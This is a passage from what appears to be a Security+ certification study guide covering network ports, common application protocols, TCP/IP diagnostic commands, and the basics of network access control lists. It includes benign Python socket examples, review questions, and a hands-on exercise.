the port, or socket. Instead of identifying a host, the port number represents a certain place on the Transport
layer that represents the end point of the conversation. The header of every TCP segment or UDP datagram
has a destination port, usually representing a specific application on the remote host listening on that port. It
also has a source port, representing where the application on the local host is listening for replies.
TCP/IP Transport protocols like TCP and UDP use 16-bit port numbers, for a range of 65,536 ports. They
don't share one range; instead, each protocol has its own independent ports. For example, TCP port 4000 and
UDP port 4000 could correspond to different applications. In practice, an application that uses multiple
protocols will generally use the same port numbers for each, so this doesn't come up much.
What this means is that each unique communications session can be defined as a unique combination like
"The connection between TCP port A on host X, with TCP port B on host Y." It's this final combination that
lets the transport layer provide true end-to-end communication to the session layer, and the applications
above.

Port ranges
An application can use multiple transport protocols, or multiple ports for a single protocol, but a single port
on a host can be used only by one application at a time. Additionally, applications can communicate most easily
when their ports are easy to find, especially when they're servers waiting for outside connections. For
instance, in theory, a web server could use any port number, but port 80 is standard. This means you never
have to type www.javatucana.com:80 into your web browser, since browsers always assume web servers are
on port 80 unless you tell them otherwise. It also means when you set up a web server, you never have to
worry some other application is using its port.
Incidentally, your web browser doesn't use port 80 as its source port: if it did, you couldn't run a web browser on the same computer that also hosts a web server. Instead, client programs connecting to servers typically use ephemeral ports or dynamic ports, which are held in a pool by the operating system and assigned only for the length of a given connection. This means the distinction between source and destination ports matters just as much as the distinction between source and destination addresses.
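The distinction is easy to see in code. In this Python sketch (a local loopback example; port 8080 is just an arbitrary choice), the server binds to a fixed port while the client's source port is drawn from the operating system's ephemeral pool.

# Minimal sketch: servers listen on a fixed port; clients get ephemeral source ports.
import socket

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 8080))         # the service's chosen, fixed port
server.listen(1)

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 8080))      # destination port is 8080...
print("Client source port:", client.getsockname()[1])   # ...source port is ephemeral

conn, addr = server.accept()
print("Server sees the connection coming from", addr)   # the same ephemeral port shows up here
conn.close()
client.close()
server.close()

Run it twice and the ephemeral port will usually change, while 8080 stays constant.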
The IANA maintains an official list of port numbers with recommendations for how they should be used by applications. Since ports are handled locally on each host, the list isn't as rigid as the IP addressing or DNS systems. Applications can be configured to use different ports, but this must be done with care: not only can that keep a remote host from successfully connecting to a server application, it can cause compatibility issues with other services on the local host.
The IANA list is separated into three ranges. Not only are ports in each range assigned differently, most
operating systems treat communications to and from different port ranges in different ways.


System ports Ports 0-1023 are assigned to the most universal and accepted TCP/IP standard applications,
or applications the IANA expects to become standards. These are often called well-known
ports because most important services are in this range. They're sometimes called privileged
ports, since many operating systems require administrative privileges to bind an application
to ports in this range.
User ports Ports 1024-49151 are assigned to applications that benefit from assigned port numbers, but
aren't so widely used that they need to become a worldwide standard. They're sometimes
called registered ports, since any creator of a valid server application can apply to the IANA
for a port number in this range. They're called user ports because any user-level application
can bind to a custom port in this range.
Private ports Ports 49152-65535 aren't assigned by the IANA, and can be used for any purpose without
registration. Usually they're used by private applications or for temporary purposes. Most
operating systems assign their pool of ephemeral ports from this range.

Common port assignments


After decades of protocol development, hundreds of ports have been assigned in the system port range alone.
Especially since they're usually transparent in normal operations it's not reasonable to expect anyone to
remember them all. At the same time, knowing ports is important for configuring applications,
troubleshooting network operations, or securing networks without blocking vital services. Firewall
configurations in particular rely heavily on port-based rules, so it's important to recognize essential, or
unwanted, applications on your network so that you can open or block those ports.

Note: A given protocol might use TCP, UDP, or both, but usually when the IANA reserves a port number
for a given application, it reserves it for all protocols.
HTTP (Hypertext Transfer Protocol): Used to retrieve data from web servers. Port: TCP 80
HTTPS (HTTP over TLS/SSL): Used for secure web pages and sites. Includes encryption services. Port: TCP 443
FTP (File Transfer Protocol): Used for transferring files between hosts. Contains basic authentication features. Ports: TCP 20 (data), TCP 21 (control)
FTPS (FTP over TLS/SSL): Used for secure file transfers. Includes encryption services. Ports: TCP 989 (data), TCP 990 (control)
TFTP (Trivial File Transfer Protocol): Simpler, less secure file transfer protocol. Sometimes used for network boot software. Port: UDP 69
Telnet: Used to log into remote systems via a virtual terminal interface. Sends all communications in plain text. Port: TCP 23
SSH, SFTP (Secure Shell): Encrypted replacement for Telnet and FTP. Includes Secure Copy Protocol (SCP) and Secure Shell FTP (SFTP). Port: TCP 22
SMTP (Simple Mail Transfer Protocol): Sends email to and between mail servers. Port: TCP 25
POP (Post Office Protocol): Retrieves email from mail servers. Port: TCP 110
IMAP (Internet Message Access Protocol): Retrieves email from mail servers. Port: TCP 143
RPC (Remote Procedure Call): Allows distributed programs on multiple computers to exchange program commands. Ports: TCP 135; UDP 135
SMB (Server Message Block): Used to share files and resources like printers. Port: TCP 445
IPP (Internet Printing Protocol): Used to communicate with network printers or print servers. Ports: TCP 631; UDP 631
Kerberos: Used for authentication services primarily on local networks and intranets. Ports: TCP 88; UDP 88
LDAP (Lightweight Directory Access Protocol): Used for network directory services. Port: TCP 389
LDAPS (Lightweight Directory Access Protocol over TLS/SSL): Used for secured network directory services. Port: TCP 636
RDP (Remote Desktop Protocol): Used for remote logins to Windows systems. Port: TCP 3389
NetBIOS (Network Basic Input/Output System): Provides name, datagram, and session services for networks using the NetBIOS API. Ports: UDP 137, 138; TCP 137, 139
SNMP (Simple Network Management Protocol): Used to remotely manage and monitor network devices. Ports: UDP 161, 162 (trap)
DNS (Domain Name System): Resolves domain names into IP addresses. Ports: TCP and UDP 53
DHCP (Dynamic Host Configuration Protocol): Dynamically assigns IP addresses and other network configuration on joining a network. Ports: UDP 67, 68
NTP (Network Time Protocol): Used to synchronize device clocks with time servers. Port: UDP 123
SRTP (Secure Real-time Transport Protocol): Used to send encrypted streaming audio or video data. Ports: commonly UDP 5004; media ports are typically negotiated per session


Discussion: Network ports


1. How do system ports differ from user ports?
System ports are assigned only to important or standardized services, and some operating systems let
only services with administrative privileges to bind to these ports. User ports can be registered by any
valid application creator, and user applications can bind to them.
2. What port on your computer does your web browser use?
The source port is from the dynamic port range allocated by the operating system. HTTP uses port 80,
but that's on the remote web server.

Application protocols
In the end, IP packets and transport layer protocols just carry the data used by the application layer protocols
which host applications and services use to communicate. These high-level protocols are very common targets of attack, partly because they give the most direct route to stealing network data, compromising host
applications, or gaining unauthorized system access. Importantly, many application protocols are insecure,
either because of poor implementation, or just being old enough that security wasn't a major concern or
possibility when they were first written.
Where possible it's best to disable or restrict use of vulnerable protocols. Many insecure protocols have
modern, secure replacements. Others can be used in conjunction with other protocols that provide security.
Application layer protocols can also benefit from security measures used on lower layers, such as by VPN or
Wi-Fi encryption. In some cases, where you can't disable a particularly vulnerable protocol you might need to
use network segmentation to make sure it's only allowed on limited, trusted network segments.

Remote access protocols


Ever since the old days of mainframes and terminals it's been popular to log into a computer or manage a
device from a remote location. There are a number of remote access protocols, with different levels of
sophistication and security.

Exam Objective: CompTIA SY0-501 2.6.2.6

Telnet Allows a command line terminal interface with a remote system. Dating to 1969,
Telnet is one of the oldest Internet standards, and uses TCP port 23. Its features are
very basic and it has no security, so it's best to disable it when possible. A similar protocol, rlogin, has comparable vulnerabilities and should also be avoided.
Secure shell (SSH) Secure shell was developed as a secure alternative to Telnet and rlogin: it allows
stronger authentication and encrypted transmission. It also allows other features,
such as file transfers. SSH uses TCP port 22.
Remote Desktop Microsoft's proprietary remote access protocol. Not only does it provide encryption
Protocol (RDP) and authentication, but it allows you to log into a complete Windows desktop over
the network. RDP uses TCP port 3389. A number of other vendors offer similar
protocols for use with their own products—their individual security features may
vary.
Simple Network Used to remotely manage and monitor network devices like routers and switches.
Management Protocol SNMP doesn't provide a direct login to the device, but rather standardizes
(SNMP) communication between managed devices and a central management application.
SNMP uses UDP ports 161 and 162. SNMPv1 had no strong security features; while
version 2 added some, they weren't widely implemented. SNMPv3 adds support for
full cryptographic security, and should be used whenever possible.


Resource sharing protocols


A variety of protocols are used to share files, user information, or other resources over the network. Some are
used over the internet, but most are primarily used for LAN services. Vulnerabilities in any of them can be
used by attackers to gather information or compromise systems.

Exam Objective: CompTIA SY0-501 2.6.1.5, 2.6.2.2, 2.6.2.5

Lightweight Directory Manages distributed directory information services across a network. It's used by
Access Protocol many directory service systems from multiple vendors, such as Novel's eDirectory
(LDAP) and Microsoft's Active Directory. LDAP allows clients to query a central network
database for information about user accounts, printers, and other network resources.
LDAP by default uses TCP port 389. Early versions of LDAP were not very secure;
modern versions can have fairly robust security options, but it's still usually only
used on trusted LANs and VPNs rather than over the internet. LDAP over SSL
(LDAPS) uses TCP port 636.
NetBIOS A session-layer API, rather than strictly a protocol, NetBIOS is designed to allow
various applications to communicate over the network. NetBIOS was designed by
IBM but is best known for its use by Microsoft Windows systems, where it was traditionally carried by the NetBEUI transport protocol and used for file and printer sharing as well as computer
identification. NetBIOS itself is only usable over local network segments, but
accessory protocols allow it to be routed over larger networks via TCP/IP or
IPX/SPX. NetBIOS uses TCP and UDP ports 137-139. Due to a number of serious
security vulnerabilities, when NetBIOS must be used it should only be enabled on
trusted local networks, not on connections accessible from the internet.
Server Message Block Allows folders or hard drives to be shared over the network and accessed much like
(SMB) they were local drives. It's not only used by file servers, but by clients sharing folders
on peer-to-peer networks. SMB was primarily developed and popularized by
Microsoft, but today is used by many vendors. SMB can operate directly over TCP
port 445, but can also run over NetBIOS using ports 137-139. Some versions of
SMB are called CIFS, but typically the two can be used interchangeably. SMB is
primarily intended for use on LANs or VPNs, rather than over the internet.
File Transfer Protocol One of the oldest Internet protocols, FTP allows network access to files. It isn't very
(FTP) secure, and it isn't very much like accessing local files at all, so it's been gradually
displaced by more secure alternatives such as SFTP (part of SSH), or FTPS (using
SSL/TLS). Still, FTP itself is in common use as a way to provide Internet access to
files when security isn't a prime concern. FTP uses TCP ports 20 and 21.
Trivial File Transfer A simplified version of FTP designed for very lightweight applications, most
Protocol (TFTP) commonly used by hosts and devices configured to boot from the network. It has
fewer features than FTP, but it also has even fewer security features, so it should only
be enabled when necessary and never used over untrusted networks. TFTP uses UDP
port 69.
Network Time A protocol used to synchronize clocks between networked computers and devices,
Protocol (NTP) rather than to transfer user data. User applications seldom access NTP directly, but
the system clock is essential to many security functions: accurate system logs,
certificate validation, some authentication methods, and more. This means attacks
against NTP can be used for DoS, MitM attacks, or unauthorized system access. NTP
has several features which can be used to prevent bad time data from being applied,
but they require updated software and secure configuration of time services. NTP
uses UDP port 123.


Hypertext Transfer Protocol


HTTP probably deserves special mention. Not only is it entirely ubiquitous in today's networks, but it's a
pretty good example of how network applications aren't just ways of accessing systems or sharing files.
Actually, HTTP does share files, but it also gives the information web browsers need to display pages,
download images, submit information to online databases, or connect to other protocols that play music and
videos or run web applications. A modern web browser can do the work of almost any application over the
network, and HTTP is at the center of it. Since it's so widely used, many network attacks are specifically
designed to exploit HTTP or web browser behaviors.

Exam Objective: CompTIA SY0-501 2.6.1.10


HTTP operates on TCP port 80 and is itself an insecure protocol. This obviously is no good for things like
online payment services and web services with user-based security. To solve this problem, HTTP Secure
(HTTPS) was developed. HTTPS is essentially the same underlying protocol as HTTP, except for two
differences.
 HTTPS operates on TCP port 443.
 HTTPS connections are encrypted using either Secure Socket Layer (SSL) or Transport Layer Security
(TLS) protocols. This not only keeps others from eavesdropping on your conversations, it helps you
make sure you're really logging into your bank's website and not a clever mockup created by a
scammer.

You can tell which protocol a web address uses by whether it begins with http:// or https://. It's
important to make sure that HTTPS is in use and properly configured when using web browsers or
configuring web servers for any sort of sensitive activities over the internet. Even then, it's only as trustworthy
as the issuing certificate authority.
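As a rough demonstration (a sketch, not a recommended way to browse; example.com is used only because it answers on both ports), the following Python code sends the same request over plain HTTP on port 80 and over TLS on port 443. The application data is identical; only the port and the encryption wrapper change.

# Minimal sketch: HTTPS is HTTP carried inside a TLS session on port 443.
import socket, ssl

request = b"HEAD / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n"

# Plain HTTP over TCP port 80
plain = socket.create_connection(("example.com", 80))
plain.sendall(request)
print("HTTP reply starts with:", plain.recv(64))
plain.close()

# The same request over TLS on TCP port 443
context = ssl.create_default_context()           # also validates the server's certificate chain
secure = context.wrap_socket(socket.create_connection(("example.com", 443)),
                             server_hostname="example.com")
secure.sendall(request)
print("HTTPS reply starts with:", secure.recv(64))
secure.close()

The certificate validation performed by create_default_context() is what ties HTTPS trust back to the issuing certificate authority mentioned above.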

Email protocols
Apart from HTTP, if there's a network service people immediately think of it's email. One thing that makes it
tricky compared to other applications is that there are different protocols used for email: even a single account
is likely to use two different protocols, with different ports and configuration settings.

Simple Mail Transfer Used to send email from clients to servers, and for transferring email between
Protocol (SMTP) servers. It's never used by clients to receive email from servers. SMTP typically
uses TCP port 25.
Post Office Protocol Used by clients to receive email from servers; never used to send email. Currently at
(POP) version 3, or POP3. POP3 isn't designed to store messages for a long time on the
server, so it works best for accounts accessed on only one device. It uses TCP port 110.
Internet Message Used by clients to receive email from servers; never used to send email. Currently at
Access Protocol version 4, or IMAP4. IMAP supports more features than POP. Since it stores all
(IMAP) messages permanently on the server it works better for accounts accessed from
multiple devices, but it also requires more server resources. It uses TCP port 143.
Messaging Application A proprietary protocol used by Microsoft Exchange email servers. It both sends and
Programming receives email, and has other specific features used by Exchange. It's not usually
Interface (MAPI) used on the Internet, but is popular in Microsoft-based networks and email clients.

By default SMTP, POP, and IMAP are unsecured, but each can be used with the same SSL or TLS protocols
used by HTTP. Depending on your email server configuration, secured access might use different ports. Since
it's hard to really control the path and security of email sent over the internet, if you want to be absolutely
certain messages are secure you might consider protocols like S/MIME or PGP which encrypt message
contents on the client level.
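As a hedged illustration, Python's standard library can open the secured variants of these protocols directly. The server name, ports, and settings below are placeholders, not real configuration; actual values come from your email provider, and some providers use SMTP over SSL on port 465 instead of STARTTLS on the submission port 587.

# Minimal sketch: opening mail protocols over SSL/TLS (mail.example.com is a placeholder).
import smtplib, imaplib, poplib

smtp = smtplib.SMTP("mail.example.com", 587)   # submission port; plain SMTP relay uses 25
smtp.starttls()                                # upgrade the session to TLS before authenticating
smtp.quit()

imap = imaplib.IMAP4_SSL("mail.example.com", 993)   # IMAP over SSL commonly uses port 993
imap.logout()

pop = poplib.POP3_SSL("mail.example.com", 995)      # POP3 over SSL commonly uses port 995
pop.quit()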


Note: All of these protocols are for use by standalone email clients. Webmail uses HTTP through a web
browser to connect to an online client (which in turn will use traditional email protocols.) Note that
many webmail accounts can be accessed from email clients too, in which case they're configured using
normal protocols.

Discussion: Application protocols


1. What server applications are active on your local network?
Answers may vary, but even a small home router will have a DHCP server for clients and a web server
for its control interface.
2. What protocols do you use to access your primary email account? Is it encrypted?
Answers may vary, but most likely POP3/SMTP, IMAP/SMTP, or MAPI. All support encrypted
connections, though not all accounts or servers use it.
3. What is the difference between HTTP and HTTPS?
HTTPS uses TCP port 443 instead of 80, and uses SSL or TLS for authentication and encryption.
4. What would be a more secure replacement for FTP?
FTPS and SFTP are two separate replacements.
5. Why is NTP important even if you never use your computer to check the time?
Many security controls rely on accurate time synchronization between computers.

TCP/IP tools
When you set up a network or troubleshoot problems, you'll need to verify settings and check connectivity.
Even if it might seem old-fashioned at first, one of the best ways to do this is using the command-line utilities
available in any Windows or Unix-like operating system with a TCP/IP stack. Their syntax is fairly simple,
and they can often tell you more information more quickly than you can get by clicking around in graphical
settings. The specific commands available, and exactly how they work, depends on your operating system and
version.

Exam Objective: CompTIA SY0-501 2.2.14

ipconfig In Windows operating systems, displays or refreshes IP settings for network interfaces.
ifconfig In Unix-like operating systems, displays or configures IP settings for network
interfaces.
netstat Displays a variety of network information including active connections, routing tables,
and traffic statistics.
nbtstat In Windows, displays diagnostic information for NetBIOS over TCP/IP.
arp Displays the IPv4 ARP cache.
nslookup Performs DNS lookups and displays the IP address of a given host name.
ping Tests the reachability and latency of a given host.
traceroute/tracert Displays the hop-by-hop path to a given host, along with the round-trip time to each
hop.
pathping In Windows, behaves similarly to tracert by pinging every hop along the route to
determine relative latency.


Even where Windows and Unix-like operating systems use the same commands, the exact syntax often varies
by exact version. If you're not used to using the command line, syntax diagrams either in books or in-line
documentation can be intimidating, but there's generally a standard. For purposes of the following
descriptions, we'll use syntax like in this sample command:
command -p ip_address [interface_name] [/all]

 command is the command name.


 -p and /all are options or switches you can use to change the command's functions. You enter
them exactly as they look.
 ip_address and interface_name are variables or arguments used with the command. In this case,
you'd enter a remote IP address or a local network interface address, respectively.
 Brackets around any element indicate that it's optional.

ipconfig
In Windows, the ipconfig command is one of your prime tools for troubleshooting connectivity problems
and retrieving basic network information. It can be used to display network settings, as well as to fix some
problems with DHCP and DNS settings. The command itself displays basic settings for all installed network
interfaces, including IPv4 and IPv6 addresses, subnet mask, and default gateway. This means you can not
only verify basic configuration, but also check whether the adapter is using a routable or self-assigned IP
address. When you suspect a host might be set to the wrong IP address, or have an improperly set gateway or
DNS server, ipconfig is a good way to check.

Exam Objective: CompTIA SY0-501 2.2.14.6

For more options, the syntax is simple. You can use any one of the following parameters.
/all: Displays additional information for each interface, including name, physical address, DNS, and DHCP settings.
/release [interface]: Releases the current IPv4 address for all interfaces, or for a single specified interface. Useful for removing bad DHCP settings.
/renew [interface]: Renews the current IPv4 address for all interfaces, or for a single specified interface. Useful for checking or repairing DHCP settings.
/release6 [interface]: Like /release, but for IPv6 addresses.
/renew6 [interface]: Like /renew, but for IPv6 addresses.
/displaydns: Displays the current contents of the DNS cache.
/flushdns: Deletes the DNS cache. Useful when the current cache has incorrect entries.
/registerdns: Renews all DHCP leases and re-registers with DNS servers.

As you can see, ipconfig is most useful for computers with dynamic IP addresses. With static addresses
you can still use it to view information and manage DNS settings, but it can't actually change IP settings.

ifconfig
Instead of ipconfig, Unix-like operating systems have the broader ifconfig command. It allows you to
configure a wide variety of interface settings, even on static IP addresses. The command itself shows address
and diagnostic information for all active interfaces. There are also a number of parameters you can use.
-a: Shows information for both active and inactive interfaces.
interface up: Enables the specified interface.
interface down: Disables the specified interface.
interface dhcp release: Releases the DHCP lease.
interface dhcp start: Leases a new DHCP address.
interface ip_address: Assigns a static IP address.
interface netmask ip_address: Assigns a netmask for a static IP address.
interface mtu value: Sets the Ethernet MTU.
interface promisc: Enables promiscuous mode, allowing the interface to read all packets passing through the network segment regardless of where they're addressed. Important for running some diagnostic tools.
interface -promisc: Disables promiscuous mode.
inet6: Inserted immediately after the interface name with any IPv4-related parameter, specifies the IPv6 equivalent.


Note: ifconfig has largely been superseded by the newer and more powerful ip command, but it's
still installed and widely used on modern systems.

netstat
Never mind a busy server, even an ordinary user workstation today has a whole list of network applications
and services moving a lot of traffic over a large number of TCP/IP connections. The netstat command
allows you to get statistics related to active connections and routing.

Exam Objective: CompTIA SY0-501 2.2.14.2

netstat itself displays a list of communication sessions along with source and destination hosts and ports.
In addition to investigating connectivity issues, it is a very useful way to find any unusual or suspicious
network connections on a host. There are a wide variety of parameters available, depending heavily on your
specific operating system.
Parameter Description
-? Displays system-specific help.

-a Displays all connections and listening ports.

-b In Windows, displays the executable which created each connection or listening port. In
BSD-based operating systems, lists traffic quantity in bytes. (Linux uses -p for the
Windows function.)

-e Displays Ethernet statistics in bytes or frames sent/received.

-f In modern Windows versions, displays FQDN for remote addresses.

-p proto In Windows, shows connections for a particular Transport layer protocol. With -s, it can
also include Network layer protocols.

-r Displays the routing table.

-s Displays statistics by protocol.

-t In Linux, displays only TCP connections.


arp
The ARP cache usually takes care of itself pretty well, but if you need information or suspect any problems
such as ARP manipulation you can use the arp command. You can even add or delete entries from the table.
The exact syntax depends on your operating system. There's a different ARP cache for each
network interface: by default any command will apply to all interfaces, but you can specify one optionally.
Some commands also allow the verbose ( -v ) parameter, showing more information.

Exam Objective: CompTIA SY0-501 2.2.14.5

Display the ARP cache, optionally limited to a listed internet address and/or local interface:
    Windows: arp -a [inet_addr] [-N if_addr] [-v]
    Linux: arp -a [-v] [-i if_addr] [inet_addr]
Add an IP address and corresponding Ethernet address to the cache:
    Windows: arp -s inet_addr eth_addr [if_addr]
    Linux: arp -s [-v] [-i if_addr] inet_addr eth_addr
Delete an entry from the cache:
    Windows: arp -d inet_addr [if_addr]
    Linux: arp -d [-v] [-i if_addr] inet_addr
Add entries from a file (Linux only):
    arp -f [-v] [-i if_addr] filename

For example, in Windows, arp -d 192.168.1.150 10.10.10.10 would delete 192.168.1.150's entry from the ARP cache, but only for the local interface with address 10.10.10.10.

nslookup
If you want to perform DNS lookups on the command line, you can use the nslookup command. It can both
perform lookups (finding the IP address of a given FQDN) and reverse lookups (finding a FQDN of a given
IP), so you can use it both to find addresses and names, or use known names and addresses just to make sure
your DNS settings are working properly. You can perform single lookups, or else you can enter an interactive
mode that lets you just enter addresses until you press Ctrl+C to return to the command line.

Exam Objective: CompTIA SY0-501 2.2.14.4


nslookup: Enters interactive mode using the default DNS server.
nslookup - server: Enters interactive mode using a specified server.
nslookup host: Performs a single lookup using the default DNS server.
nslookup host server: Performs a single lookup using a specified server.

In Unix-like operating systems the similar dig command allows you to make more detailed DNS queries.
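If you need the same kind of query from a script instead of the command line, the operating system's resolver is available through Python's socket module. A small sketch, using www.weather.gov (the same hostname as the exercise below) purely as an example:

# Minimal sketch: forward and reverse DNS lookups, roughly what a single nslookup query does.
import socket

name = "www.weather.gov"
addr = socket.gethostbyname(name)          # forward lookup: name -> IPv4 address
print(name, "resolves to", addr)

try:
    host, aliases, addrs = socket.gethostbyaddr(addr)   # reverse lookup: address -> name
    print(addr, "reverse-resolves to", host)
except socket.herror:
    print(addr, "has no reverse (PTR) record")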

ping
One of the most important command-line tools is ping, which checks connectivity to a given host in terms of packet loss percentage and round-trip latency; the TTL values in the replies can also hint at the number of hops traversed. Typically, one use of the command sends several individual echo request packets, each measured individually. For basic functionality you need only an address to ping, but each operating system includes a number of optional parameters.

Exam Objective: CompTIA SY0-501 2.2.14.1

ping [parameters] address


-n count: In Windows, sends a specified number of pings.
-c count: In Linux, sends a specified number of pings.
-t: Continues to ping until stopped.
-a: Attempts to do a reverse DNS lookup of the IP address pinged.
-l size: Sets the size of the packet (default 32 bytes).
-f: Prevents packet fragmentation. With a large packet, you can use this to troubleshoot MTU problems.
-i TTL: Sets the TTL value of the packet (max 255).
-w time: Sets the timeout value for each packet in milliseconds (default 4000).
-4 or -6: Forces use of IPv4 or IPv6. On some systems, the latter may just be called ping6.

For security reasons, the echo request packets used by ping are blocked by some hosts and firewalls. Inability
to ping a particular target shouldn't be seen as proof that there's a more general network interruption.
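When ICMP is filtered, one crude fallback is a plain TCP connection test against a port you know should be open. This isn't ping, and it measures connection setup time rather than echo round trips, but it can confirm reachability. The host and port in this Python sketch are placeholders; only probe systems you're authorized to test.

# Minimal sketch: TCP-based reachability and latency check when echo requests are blocked.
import socket, time

host, port = "www.example.com", 443        # placeholder target and port
start = time.monotonic()
try:
    s = socket.create_connection((host, port), timeout=3)
    s.close()
    print("Reachable on TCP %d in %.1f ms" % (port, (time.monotonic() - start) * 1000))
except OSError as err:
    print("Could not connect:", err)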

traceroute
When ping isn't enough and you want to know the network path to a remote host, you can use the
traceroute command, or tracert in Windows. It doesn't just report the round trip time and number of
hops to the remote host, it reports the name, address, and latency of each hop along the way. This lets you
look for routing loops, inefficient routes, or high latency (and thus likely overloaded) routers along the way.
Such routes can indicate network misconfigurations, failed routes, or even deliberate traffic redirection.

Exam Objective: CompTIA SY0-501 2.2.14.3


Like ping, the basic syntax of traceroute is traceroute [options] address. Also like ping, different implementations use tracert6, traceroute6, or the -6 parameter for IPv6 functionality.
Windows -d, Linux -n: Doesn't perform reverse DNS lookups.
Windows -h maximum_hops, Linux -m maximum_hops: Specifies maximum TTL (default 30).
Windows -w milliseconds, Linux -w seconds: Specifies timeout (Windows default 4000 ms, Linux default 5.0 s).

Exercise: Using TCP/IP tools


Do This / How & Why

1. In Windows 7, type cmd into the search box.
   The command window opens.

2. Check your IP settings using ipconfig.
   a) Type ipconfig
      The IP settings for all network adapters are displayed, including IPv4 and IPv6 addresses, subnet masks, and default gateways.
   b) Type ipconfig /all
      Scroll up in the command window if necessary. The /all parameter shows additional information, such as physical address, DNS servers, and DHCP settings.
   c) Type ipconfig /?
      The help option shows detailed command usage. You could also release or renew a DHCP lease, among other things.
   d) How would your options differ if you were using ifconfig in Linux?
      Apart from the syntax working a bit differently, you can also configure static IP addresses and a number of other interface settings.

3. View your ARP cache.
   a) Type arp.
      Just typing the command shows the documentation this time.
   b) Use the parameter to display current ARP entries for all adapters.
      Type arp -a or arp -g. The exact results may vary depending on your recent network usage.

4. Type ping www.weather.gov.
   Your connectivity and latency to the National Weather Service website is displayed. Notice that the FQDN shown by ping isn't the same one you entered.

5. Type nslookup www.weather.gov.
   Akamai Technologies is a content delivery service that among other clients hosts the NWS website. The DNS lookup data for the website is displayed. www.weather.gov is actually an alias for that particular akamai.net FQDN.

6. Type tracert www.weather.gov.
   You could use tracert if you're suspicious that traffic is being redirected on its route. tracert displays ping times to each router hop between you and the destination website, along with both the FQDN and IP address for each.

7. Close the command line window.

Assessment: Network ports and applications


1. Match the network protocols with their default ports

Telnet 110

SSH 25

SNMP 636

SMTP 161

FTP 23

LDAPS 53

DNS 22

POP 143

IMAP 21


2. You want to securely connect to a server via a command line terminal interface. What protocol should you
use? Choose the best answer.
 FTP
 LDAP
 SSH
 Telnet

3. How many total packets need to be exchanged for a TCP handshake? Choose the best response.
 2
 3
 4
 5

4. What kind of communications would be suitable for UDP? Choose all that apply.
 DNS requests
 File transfers
 Online games
 Streaming video
 Website connections

5. Your company's custom server software application needs a TCP port to listen on. What port range should
it be configured to use?
 Private
 System
 User

6. What protocol would you use to connect to a shared drive on another Windows system? Choose the best
answer.
 AFP
 FTP
 SMB
 SNMP

7. HTTPS adds security to HTTP and uses a different port, but otherwise is fundamentally the same. True or
false?
 True
 False


Summary: Network fundamentals


You should now know:
 About network models, Data Link layer technologies such as switches and VLANs, Network layer
technologies such as routing and IP, and unconventional network devices like VoIP and SANs.
 About IPv4 and IPv6 address formats, address resolution protocols, and network address translation.
 How transport layer protocols work, about commonly used network ports, and how to identify common
network application protocols.



Chapter 5: Securing networks
You will learn:
 About network security appliances
 How to secure data via transport encryption
 How to harden networks
 How to monitor networks and detect threats


Module A: Network security components


While "conventional" network devices and protocols can be configured or enhanced to improve security,
modern networks rely heavily on devices and software designed primarily to secure the network. The most
prominent and familiar of these are the firewalls found on almost all modern networks, but a number of others
are also important.
You will learn:
 About network ACLs
 About firewalls
 About IDS and IPS systems
 About other security and optimization devices

Network access control lists


Even when you're dealing with authenticated users, the next step, authorization, is all about determining what
resources they're allowed to access. There are a number of ways to do this, but one of the most common is
through Access control lists (ACLs). An ACL is a list attached to a resource, giving permissions, or rules,
about exactly who can access it. It's important to recognize that network ACLs are much different in function
than ACLs used in host file systems or applications. Instead of specifying what users or roles can access a
particular file or resource, on the network an ACL specifies what types of traffic are and aren't allowed to pass
through a device like a router or firewall. Different vendors may use different terms, but the important thing is
that a network ACL restricts unwanted traffic from passing through a device.
This application of network ACLs is called packet filtering, and it's one of the oldest and most common ways
of restricting network traffic for security purposes. For example, if you associated an IP address with repeated
attacks against your network, you could create an ACL that blocks traffic from that address. Similarly, if you
wanted to prevent network users from accessing a known phishing site, you could block access to its IP
address using an ACL. Inbound and outbound rules are typically on separate ACLs.

Exactly what parameters an ACL includes depends entirely on the device and software, and on where the
device is placed. ACLs on devices on the edges of the network tend to focus on edge control, examining
packet origins to restrict outside traffic. ACLs on interior devices tend to focus on core control, examining
packet destinations to control or restrict their paths through the network and breaking the internal network
into different security zones. Routers can commonly filter according to several criteria.
 IP address (source or destination)


 MAC address (source or destination)


 Port number (source or destination)
 Protocols used

Even a given device might support different options for filtering inbound and outbound traffic, or have other
restrictions. For example, Cisco routers allow standard ACLs, which run quickly but can check only source IP addresses, and extended ACLs, which can filter by many more criteria but are more processor intensive.

ACL rules
An ACL is a lot like a MAC table or routing table, which should be no surprise since it's performing similar
functions. When a router (for example) receives a packet it checks it against the ACL and applies whatever
rule fits the situation. This has a few potential complications. One's just like with a MAC or routing table:
what happens if there isn't a rule for it? There are two basic models for access security, based on default
behavior: they apply not just to routers, but to all sorts of access control systems.

Exam Objective: CompTIA SY0-501 2.1.1.1, 2.1.1.4

Implicit Deny Access is denied unless a rule explicitly allows it. An ACL containing only explicit
allowances is often called a whitelist.
Implicit Allow Access is allowed unless a rule explicitly denies it. An ACL containing only explicit
denials is called a blacklist.

Implicit deny is the norm for secure systems, since it's harder to leave security holes by forgetting or deleting
important entries. That doesn't mean an ACL is just a whitelist, however; there are reasons why you might
need to explicitly deny certain traffic just as there are reasons you might need to explicitly allow it.
A big reason for the last fact is that network ACLs, either in purpose or construction, aren't just like routing
tables. For one, they apply to multiple dimensions. If you wanted to allow traffic from a specific subnet,
except for just one host, you technically could whitelist two ranges, with that host excluded. But what
happens if you want to allow all traffic from a certain IP range, but disallow all external telnet connections?
Because rules can conflict, ACLs have an order: depending on the system it might be a literal line by line
order, or a priority number assigned to each rule, but the process is the same.

1. Packets are matched against each rule in order.


2. The first rule that matches, allow or deny, is immediately applied. No other rules are processed.
3. If no rules match, the implicit deny applies.
For that prior example, you might have an ACL with the following rules (even if an actual router would have
more fields and use a different syntax).
Number  Source address  Protocol  Destination port  Action  Description
1 Any TCP 23 DENY Deny all traffic to the Telnet port.

2 10.10.0.0 /16 Any Any ALLOW Allow all traffic from the 10.10.0.0 subnet.

∞ All All All DENY Implicit deny all (Not explicitly listed).

When a packet arrives, it's processed against each rule: no matter what the packet is, only one rule will be
applied. Let's look at some examples.


Source address Protocol Destination port Result


192.168.20.13 TCP 23 DENY (Rule 1)

10.10.92.138 TCP 80 ALLOW (Rule 2)

10.10.92.138 TCP 23 DENY (Rule 1)

192.168.100.120 TCP 80 DENY (Implicit)

10.10.33.127 UDP 23 ALLOW (Rule 2)

